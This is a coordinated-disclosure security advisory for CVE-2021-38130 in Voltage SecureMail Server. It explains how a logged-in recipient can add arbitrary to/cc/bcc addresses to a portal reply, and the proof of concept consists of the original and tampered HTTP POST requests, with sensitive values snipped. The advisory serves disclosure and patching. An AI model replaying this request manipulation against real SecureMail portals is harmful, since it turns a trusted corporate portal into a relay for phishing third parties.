Voltage SecureMail Server Business Logic Bypass

`Security Advisory  
=======================================================================  
title: Business Logic Bypass - Mail Relay  
(Post-authenticated)  
product: Voltage SecureMail Server  
vulnerable version: Voltage SecureMail Server <v7.3.0.1  
fixed version: Voltage SecureMail Server v7.3.0.1  
CVE number: CVE-2021-38130  
impact: Medium  
homepage: https://www.microfocus.com/en-us/cyberres/data-privacy-protection/secure-mail  
found: 2021-06-25  
by: TING Meng Yean (GIS Red Team)  
United Overseas Bank Limited (UOB)  
  
=======================================================================  
  
Vendor description:  
-------------------  
Voltage SecureMail simplifies compliance to privacy regulations,  
including MA, PCI, HITECH, UK FSA, and EU Data privacy directives,  
and mitigates the risk of email security breaches. Voltage SecureMail  
provides end-to-end security for email and attachments, inside the  
enterprise to the desktop, at the enterprise gateway, and across  
leading mobile smartphones and tablets. The solution provides the  
confidence and peace of mind that sensitive data is protected in  
transit and in storage, wherever it is in an email system to any  
inbox (e.g., Outlook, Lotus Notes, Gmail, and Yahoo!), without  
disrupting existing email services or business processes.  
  
Source: http://www.securemailworks.com/SecureMail.asp  
  
  
Business recommendation:  
------------------------  
The vendor provides a patch and users of this product are urged to  
upgrade to the latest version available.  
  
Reference: https://portal.microfocus.com/s/article/KM000003667  
  
An in-depth security analysis performed by security professionals is  
highly advised, as the software may be affected from further security  
issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
Business Logic Bypass - Mail Relay (Post-authenticated)  
- CVE CVE-2021-38130  
- CWE-284: Improper Access Control  
- CVSSv3: 5.4 (Medium)  
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N  
  
  
Voltage SecureMail is an email protection service that provides email  
encryption. With each secure email, there is an HTML attachment named  
"message_zdm.html" that furnishes access to the Zero Download Messenger  
(ZDM), which can be a web portal or mobile app. The encrypted body of  
the original message as well as any attachments to the original email  
is contained within this attachment.  
  
The email recipient needs to install Voltage SecureMail app (for mobile) or  
browse to the Voltage SecureMail Server portal (desktop) to authenticate and  
view any secure email and attachments sent via ZDM.  
  
When the recipient opens the "message_zdm.html" file for the first time  
on a desktop, the browser is brought to the corporation's SecureMail  
portal where the user has to create a password in order to continue.  
  
An email verification email is sent to the recipient with a One Time Link,  
and the recipient can read the email on the SecureMail portal after clicking  
on the link.  
  
If the recipient opens the "message_zdm.html" file again in the future,  
the recipient has to input the previously created password.  
  
When viewing the email on the SecureMail portal, the recipient can  
choose to reply to the email by clicking "Reply" or "Reply to All".  
The SecureMail portal only allows the recipient to reply to the  
original email sender and to the email addresses in the Cc/Bcc list.  
However, it is possible to modify the original email addresses in the  
"to", "cc" or "bcc" fields, or to add arbitrary email addresses, by  
sending a special POST request.  
  
As the SecureMail portal displays the logo and valid SSL certificate of  
the corporation in use, an attacker who have received a SecureMail encrypted  
email previously can make use of the SecureMail portal to send phishing  
emails to third parties. Note that the attacker is unable to spoof  
the "from" address, so the emails to third parties will be from the  
attacker's email address.  
  
  
Proof of concept:  
-----------------  
When the recipient replies to the email by clicking "Reply" or "Reply to All", the  
recipient is brought to the "Compose New Message" page. To send the email reply,  
the recipient then clicks on the "Send Secure" button.  
  
The SecureMail portal does not allow the modification of the "to", "cc" or  
"bcc" field if the user attempts to intercept the POST request after  
clicking on the "Send Secure" button.  
  
However, if the user attempts to intercept the POST request after  
clicking on the "Plain Text" button, the modification of the "to", "cc" or  
"bcc" field is successful.  
  
The modified email is then successfully sent out after the user  
click on the "Send Secure" button.  
  
It is noted that there is one difference in the POST request parameters  
between a "Send Secure" and "Plain Text" that allows the "to", "cc" and  
"bcc" fields to be modified, and the difference is the "send" versus "x"  
parameters. The rest pf the contents of the "Send Secure" and "Plain Text"  
POST requests are almost identical.  
  
  
  
Original "Send Secure" Request  
########################################################################  
POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1  
Host: <...snipped...>  
Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...>  
Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372  
Te: trailers  
  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="CSRFToken"  
  
<...snipped...>  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="c"  
  
c3  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="h"  
  
h924481124  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="send"  
  
send  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="senderKeyEnc"  
  
<...snipped...>  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="to"  
  
[email protected]  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="showCcEnabled"  
  
on  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="cc"  
  
  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="bcc"  
  
  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="subject"  
  
RE: <...snipped...>  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="attachment"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="editModeToggle"  
  
0  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="body"  
  
<...snipped...>  
-----------------------------289584800395870328816642372  
########################################################################  
  
  
  
  
Modified "Plain Text" request  
########################################################################  
POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1  
Host: <...snipped...>  
Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...>  
Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372  
Te: trailers  
  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="CSRFToken"  
  
<...snipped...>  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="c"  
  
c3  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="h"  
  
h924481124  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="x"  
  
x  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="senderKeyEnc"  
  
<...snipped...>  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="to"  
  
[email protected]  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="showCcEnabled"  
  
on  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="cc"  
  
[email protected]  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="bcc"  
  
[email protected]  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="subject"  
  
RE: <...snipped...>  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="attachment"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="editModeToggle"  
  
1  
-----------------------------289584800395870328816642372  
Content-Disposition: form-data; name="body"  
  
<...snipped...>  
-----------------------------289584800395870328816642372--  
########################################################################  
  
  
As of the patched Voltage SecureMail Server version 7.3.0-259490, the  
vulnerability for the "Plain Text" was no longer replicable. However, the same  
vulnerability can be replicated using the "Attach" function.  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* 7.3  
* 7.3.0-259490  
  
  
Vendor contact timeline (GMT+8):  
--------------------------------  
2021-06-25: Contacting vendor through their SecureMail product support team.  
2021-06-28: Contacting Micro Focus Product Security Response Team (PSRT)  
[email protected] to request for CVE number.  
2021-06-29: Micro Focus PSRT opened PSRT case 80358.  
2021-07-02: SecureMail product support team confirmed the vulnerability and  
working on patch.  
2021-07-31: SecureMail product support team released test patch v7.3.0-259490.  
2021-08-04: Confirmed vulnerability "Plain Text" function was no longer  
replicable, but the same vulnerability can be replicated using the  
"Attach" function. Notified the SecureMail product support team.  
2021-11-11: SecureMail product support team released patch v7.3.0.1.  
2022-01-21: Requested Micro Focus PSRT for updates.  
2022-01-24: Micro Focus PSRT responded with assigned CVE number.  
2022-01-29: Micro Focus PSRT published security bulletin.  
2022-02-03: Coordinated release of security advisory.  
  
  
Solution:  
---------  
According to the vendor, Voltage SecureMail resolved this vulnerability  
in the version 7.3.0.1 patch release and customers should contact their support  
representative for information about downloading and applying the patch.  
  
  
Security Bulletin URL:  
----------------------  
https://portal.microfocus.com/s/article/KM000003667  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Meng Yean TING (GIS Red Team)  
United Overseas Bank Limited (UOB)  
  
-----BEGIN PGP PUBLIC KEY BLOCK-----  
  
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  
JMIzsDM4+GTLxyZrv4jCloLk9g==  
=nECi  
-----END PGP PUBLIC KEY BLOCK-----  
UOB EMAIL DISCLAIMER  
Any person receiving this email and any attachment(s) contained,  
shall treat the information as confidential and not misuse, copy,  
disclose, distribute or retain the information in any way that  
amounts to a breach of confidentiality. If you are not the intended  
recipient, please delete all copies of this email from your computer  
system. As the integrity of this message cannot be guaranteed,  
neither UOB nor any entity in the UOB Group shall be responsible for  
the contents. Any opinion in this email may not necessarily represent  
the opinion of UOB or any entity in the UOB Group.  
  
  
  
`